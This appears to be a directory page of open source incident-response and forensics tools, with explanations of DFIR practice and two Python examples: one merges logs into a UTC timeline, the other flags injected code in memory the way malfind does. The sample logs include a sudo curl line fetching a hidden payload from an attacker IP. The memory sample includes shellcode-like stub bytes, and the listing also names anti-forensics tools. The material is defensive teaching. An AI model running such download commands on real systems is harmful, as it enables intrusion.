Respond to security incidents effectively with free and open source tools. Browse digital forensics, incident response platforms, memory analysis, and log analysis tools for DFIR teams.
Showing 24 of 164 tools

mvt-project/mvt
MVT (Mobile Verification Toolkit) helps with conducting forensics of mobile devices in order to find signs of a potential compromise.

danluu/post-mortems
A collection of postmortems. Sorry for the delay in merging PRs!
horsicq/Detect-It-Easy
Program for determining types of files for Windows, Linux and MacOS.
upgundecha/howtheysre
A curated collection of publicly available resources on how technology and tech-savvy organizations around the world practice Site Reliability Engineering (SRE)
meirwah/awesome-incident-response
A curated list of tools for incident response
WithSecureLabs/chainsaw
Rapidly Search and Hunt through Windows Forensic Artefacts
TracecatHQ/tracecat
All-in-one AI automation platform (workflows, agents, cases, tables) for security, IT, and production engineering teams.
google/timesketch
Collaborative forensic timeline analysis

kevoreilly/CAPEv2
Malware Configuration And Payload Extraction
grayddq/GScan
This program is intended to make it easier for security incident responders to triage Linux hosts: it automates comprehensive host-side checklist detection, aggregates the results automatically, and traces the attacker's path through the host.
mikeroyal/Digital-Forensics-Guide
Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.
frankwxu/digital-forensics-lab
Free hands-on digital forensics labs for students and faculty
stuxnet999/MemLabs
Educational, CTF-styled labs for individuals interested in Memory Forensics
Srinivas11789/PcapXray
PcapXray - A network forensics tool that visualizes a packet capture offline as a network diagram, including device identification, highlighting of important communication, and file extraction
PabloLec/RecoverPy
Interactively find and recover deleted or overwritten files from your terminal
CYB3RMX/Qu1cksc0pe
All-in-One malware analysis tool.
austinsonger/Incident-Playbook
GOAL: Incident Response Playbooks Mapped to MITRE Attack Tactics and Techniques. [Contributors Friendly]
yampelo/beagle
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
tclahr/uac
UAC is a powerful and extensible incident response tool designed for forensic investigators, security analysts, and IT professionals. It automates the collection of artifacts from a wide range of Unix-like systems, including AIX, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris.
TryCatchHCF/DumpsterFire
"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue- & Red Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
target/strelka
Real-time, container-based file scanning at enterprise scale

shadawck/awesome-anti-forensic
Tools and packages that are used for countering forensic activities, including encryption, steganography, and anything that modify attributes. This all includes tools to work with anything in general that makes changes to a system for the purposes of hiding information.
Drew-Alleman/DataSurgeon
Quickly extracts IPs, email addresses, hashes, files, credit card numbers, Social Security numbers and a lot more from text
DFIRKuiper/Kuiper
Digital Forensics Investigation Platform
The NIST incident response lifecycle (as defined in NIST SP 800-61 Rev. 2) has four phases: Preparation (building capabilities before incidents), Detection & Analysis (identifying and understanding incidents), Containment, Eradication & Recovery (stopping and removing the threat), and Post-Incident Activity (lessons learned). Tools in this list support each phase: playbook collections and drill generators such as DumpsterFire for preparation, artifact hunters and timeline tools such as Chainsaw and Timesketch for detection and analysis, collectors and case-management platforms for containment and recovery, and postmortem collections for post-incident review.
TheHive is a widely used security incident response platform providing case management, task tracking, and integration with MISP (threat intelligence sharing) and Cortex (observable analysis and active response). TheHive 4 is open source under the AGPL; TheHive 5 is a commercial product from StrangeBee, so check the license of the version you deploy if an open source platform is a requirement. It is designed for SOC teams and supports collaborative investigation workflows.
Key DFIR tools include Autopsy (disk forensics, built on The Sleuth Kit), Volatility (memory forensics), Plaso/log2timeline (super-timeline generation, usually reviewed in Timesketch), Velociraptor (endpoint artifact collection, live forensics and threat hunting), and KAPE (targeted artifact collection; KAPE is free to use but, unlike the others, is not open source). The SANS SIFT Workstation bundles many of these tools in a pre-configured Ubuntu-based environment.
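Timeline analysis is only useful once every source has been normalized to the same clock. The following added example (not Plaso or Timesketch code) shows the step those tools perform for you: three constructed log fragments, each stamping time differently (syslog without year or zone, Windows-style event text in UTC, an Apache access log with a numeric offset), are parsed, converted to UTC and merged in order. The host clock offset for web01 and the syslog year are assumptions supplied by the analyst, exactly as Plaso requires via its --timezone option.

```python
"""Normalize heterogeneous log sources into one UTC-sorted super timeline.

Added example; not Plaso or Timesketch code. Every source is parsed, its
timestamp converted to UTC, and the events are merged in time order so
activity across hosts lines up.
"""
import re
from datetime import datetime, timedelta, timezone

UTC = timezone.utc

# Constructed sample records (not real case data). Each source stamps time
# differently: syslog has no year and no zone, Windows-style event lines are
# UTC with a trailing 'Z', Apache access logs carry a numeric offset.
SAMPLE_SYSLOG = [
    "Mar 14 02:13:07 web01 sshd[2211]: Accepted password for deploy from 203.0.113.45 port 51022 ssh2",
    "Mar 14 02:13:09 web01 sudo: deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/curl -o /tmp/.x http://203.0.113.45/x",
]
SAMPLE_WINEVT = [
    "2024-03-14T07:12:30Z 4624 DC01 An account was successfully logged on: svc_backup from 203.0.113.45",
]
SAMPLE_APACHE = [
    '203.0.113.45 - - [13/Mar/2024:21:10:55 -0500] "GET /wp-login.php HTTP/1.1" 200 3512',
]

# Assumption: web01's clock is set to UTC-4. syslog does not record this, so
# the analyst must supply it (Plaso's --timezone). Same for the missing year.
WEB01_TZ = timezone(timedelta(hours=-4))
SYSLOG_YEAR = 2024

_SYSLOG_RE = re.compile(r"^(\w{3}) +(\d{1,2}) (\d\d:\d\d:\d\d) (\S+) (.*)$")
_WINEVT_RE = re.compile(r"^(\S+Z) (\d+) (\S+) (.*)$")
_APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+$')


def parse_syslog(line, host_tz, year):
    """Syslog: attach the supplied year and host zone, then convert to UTC."""
    m = _SYSLOG_RE.match(line)
    if not m:
        return None
    mon, day, hms, host, msg = m.groups()
    local = datetime.strptime(f"{year} {mon} {day} {hms}", "%Y %b %d %H:%M:%S")
    return (local.replace(tzinfo=host_tz).astimezone(UTC), "syslog", host, msg)


def parse_winevt(line):
    """Windows-style event text already in UTC (trailing 'Z')."""
    m = _WINEVT_RE.match(line)
    if not m:
        return None
    ts, event_id, host, msg = m.groups()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=UTC)
    return (when, "winevt", host, f"EventID {event_id}: {msg}")


def parse_apache(line, host="web01"):
    """Apache combined log: %z parses the explicit offset, then convert to UTC."""
    m = _APACHE_RE.match(line)
    if not m:
        return None
    client, ts, request, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").astimezone(UTC)
    return (when, "apache", host, f"{client} {request} -> {status}")


def build_timeline(syslog=SAMPLE_SYSLOG, winevt=SAMPLE_WINEVT, apache=SAMPLE_APACHE):
    """Return events as (iso_utc, source, host, message), oldest first."""
    events = [parse_syslog(l, WEB01_TZ, SYSLOG_YEAR) for l in syslog]
    events += [parse_winevt(l) for l in winevt]
    events += [parse_apache(l) for l in apache]
    events = [e for e in events if e is not None]
    events.sort(key=lambda e: e[0])  # aware datetimes sort by absolute instant
    return [(e[0].strftime("%Y-%m-%dT%H:%M:%SZ"), e[1], e[2], e[3]) for e in events]


def render_tsv(timeline):
    return "\n".join("\t".join(row) for row in timeline)


if __name__ == "__main__":
    print(render_tsv(build_timeline()))
```

Note the pitfall the sorted output exposes: the Apache hit looks like the evening of 13 March in the raw log, but in UTC it precedes the sshd login on web01 by a few hours, which is the order an investigator needs to see.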
The Volatility Framework is the standard open source tool for memory forensics. It parses RAM dumps (raw captures, crash dumps, hibernation files, VM snapshots) against OS symbol tables to reconstruct running processes, network connections, loaded drivers and kernel modules, handles, and injected code (the malfind plugin lists private, executable memory regions that are not backed by a file on disk). Volatility 3 is the current branch; Rekall was an alternative framework but is no longer maintained. Memory forensics is critical for detecting fileless malware, process injection and advanced persistent threats, because such tooling leaves little or nothing on disk.
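The injected-code check described above can be shown without a real memory image. This added example (not Volatility code) models the per-process view Volatility reconstructs, a list of memory regions with their protection, backing file and first bytes, and applies the heuristic that the windows.malfind plugin automates: private, executable memory that is not backed by a file and contains a PE header or non-zero code is a candidate for injection. The region list, process names and byte contents are constructed for illustration; the page-protection constants are the real winnt.h values.

```python
"""Flag injected code the way a malfind-style memory scan does.

Added example; this is not Volatility code and does not parse a real memory
image. It models what Volatility recovers per process (memory regions with
protection, backing file and the first page of content) and applies the
malfind heuristic to them.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Windows page-protection constants (winnt.h).
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}


@dataclass
class Region:
    pid: int
    process: str
    start: int
    size: int
    protection: int
    mapped_file: Optional[str]  # None means private (VadS) memory, not file-backed
    head: bytes                 # first bytes of the region, as malfind prints them


def has_pe_header(data: bytes) -> bool:
    """True if data starts with an MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(region: Region) -> Optional[str]:
    """Return a finding label for a suspicious region, or None if it looks benign."""
    if region.protection not in EXECUTABLE:
        return None                      # not executable: out of scope
    if region.mapped_file is not None:
        return None                      # image/file-backed: loaded the normal way
    if not any(region.head):
        return None                      # committed but never written: noise
    if has_pe_header(region.head):
        return "pe_in_private_memory"    # reflectively loaded DLL or hollowed image
    if region.protection == PAGE_EXECUTE_READWRITE:
        return "rwx_private_code"        # shellcode, or a JIT arena: triage manually
    return "unbacked_executable"


def scan(regions: List[Region]) -> List[Tuple[int, str, str, str]]:
    findings = []
    for r in regions:
        label = classify(r)
        if label:
            findings.append((r.pid, r.process, hex(r.start), label))
    return findings


def fake_pe(size: int = 0x1000) -> bytes:
    """Constructed minimal MZ/PE header for the sample regions (not a real binary)."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)   # e_lfanew -> PE signature at 0x80
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


# Constructed sample process memory (not from a real image).
SAMPLE_REGIONS = [
    Region(4412, "explorer.exe", 0x7FFB1C000000, 0x1F0000, PAGE_EXECUTE_READ,
           r"\Windows\System32\ntdll.dll", fake_pe()),          # normal mapped DLL
    Region(4412, "explorer.exe", 0x1E0000, 0x10000, PAGE_READWRITE, None,
           bytes(16) + b"A" * 16),                              # ordinary heap
    Region(4412, "explorer.exe", 0x2A0000, 0x6000, PAGE_EXECUTE_READWRITE, None,
           fake_pe()),                                          # PE with no file behind it
    Region(6120, "svchost.exe", 0x30000, 0x1000, PAGE_EXECUTE_READWRITE, None,
           b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00" + bytes(54)),  # code-like RWX stub
    Region(7200, "chrome.exe", 0x3C0000, 0x100000, PAGE_EXECUTE_READWRITE, None,
           bytes(64)),                                          # zero-filled JIT reservation
]

if __name__ == "__main__":
    for pid, name, addr, label in scan(SAMPLE_REGIONS):
        print(f"{pid:>6} {name:<14} {addr:<16} {label}")
```

The two hits are the ones an analyst would dump and disassemble (Volatility 3's windows.malfind has a --dump option for exactly that). The rwx_private_code label in particular needs manual triage: .NET, browsers and other JIT runtimes legitimately allocate private RWX memory, so the heuristic narrows the search rather than proving injection.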